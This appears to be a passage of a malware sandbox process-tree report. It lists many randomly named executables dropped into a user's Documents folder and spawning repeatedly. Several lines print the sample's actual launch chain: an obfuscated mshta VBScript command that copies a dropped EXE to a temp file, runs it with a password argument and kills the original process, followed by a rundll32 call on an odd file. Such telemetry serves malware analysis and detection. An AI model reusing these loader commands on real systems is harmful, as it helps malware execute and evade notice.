- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22132
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6160
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6188
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20544
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7864
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:1300
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8916
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7392
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:3980
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:1048
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9724
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22540
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:23892
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:24308
- C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe
  "C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe"
  2⤵
  - Executes dropped EXE
  PID:2052
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
    3⤵
    PID:3620
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\bPKTaDXeFDHEbGWBT3qYfzcu.exe" ) do taskkill -F /Im "%~nXN"
      4⤵
      PID:2452
    - - C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE
        
        KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG
        5⤵
        
        PID:4436
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
        6⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"
        7⤵
        
        PID:6636
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\p_ZPP.J p
        6⤵
        
        PID:6636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F /Im "bPKTaDXeFDHEbGWBT3qYfzcu.exe"
        5⤵
        Kills process with taskkill
        
        PID:6440
- C:\Users\Admin\Documents\nnuFTnFOE64UvJek5AkKs1Uv.exe
  "C:\Users\Admin\Documents\nnuFTnFOE64UvJek5AkKs1Uv.exe"
  2⤵
  PID:4396
- C:\Users\Admin\Documents\ghtUbTrayCQ0VKVO6v0AUv6Y.exe
  "C:\Users\Admin\Documents\ghtUbTrayCQ0VKVO6v0AUv6Y.exe"
  2⤵
  - Executes dropped EXE
  PID:4328
- C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
  "C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe"
  2⤵
  - Executes dropped EXE
  PID:4276
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10528
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10876
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11164
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10304
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11000
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11140
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:6528
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10572
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11176
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:9776
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:3344
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11356
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11624
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11824
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12084
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:9676
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9676 -s 24
      4⤵
      Program crash
      PID:11752
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:184
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12064
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12276
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11752
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11324
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11120
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11444
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11292
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:9304
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10816
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12424
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11860
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12384
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13052
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13032
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:4188
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13572
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13920
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14316
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14012
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13668
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13644
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14536
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14968
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13628
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13528
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15012
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15136
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11872
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11792
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10868
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13256
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14592
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11900
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11584
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15888
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16292
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15192
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15192 -s 24
      4⤵
      PID:15212
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12444
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11776
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:9476
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13072
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16248
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:12456
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11832
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:9980
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:6092
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15528
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16008
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:3032
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:1768
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15728
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16328
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:10720
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16176
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13408
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:8788
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16464
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16716
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16992
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17144
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14884
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16600
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17068
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15488
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:7812
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13516
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:1980
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17256
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14376
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16640
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:5296
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16160
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16484
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17572
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17752
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17956
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15500
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17460
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16968
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18064
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18184
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18324
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18080
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18164
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:4272
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18216
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17820
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:13176
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18348
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14920
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:2452
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18584
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18804
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19216
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19432
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18600
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17296
